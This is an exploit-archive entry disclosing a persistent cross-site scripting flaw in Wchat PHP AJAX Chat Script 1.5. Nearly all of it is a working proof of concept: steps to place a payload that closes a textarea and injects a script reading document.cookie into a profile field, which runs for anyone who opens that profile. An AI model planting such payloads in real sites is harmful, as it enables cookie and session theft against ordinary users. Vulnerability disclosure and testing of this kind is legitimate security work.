Wchat PHP AJAX Chat Script 1.5 - Persistent Cross-Site Scripting Vulnerability

2018-05-22T00:00:00
ID 1337DAY-ID-30403
Type zdt
Reporter L0RD
Modified 2018-05-22T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: Wchat - Fully Responsive PHP AJAX Chat Script  1.5 - Persistent cross site scripting
# Exploit Author: Borna nematzadeh (L0RD)
# Vendor Homepage: https://codecanyon.net/item/wchat-fully-responsive-phpajax-chat/18047319?s_rank=1327
# Version: 1.5
# Tested on: Windows
 
# POC :
1) Create your account and navigate to "Edit profile"
2) Put this payload into textarea :
</textarea><script>console.log(document.cookie)</script>
3) The payload will be executed if someone opens your profile .

#  0day.today [2018-05-22]  #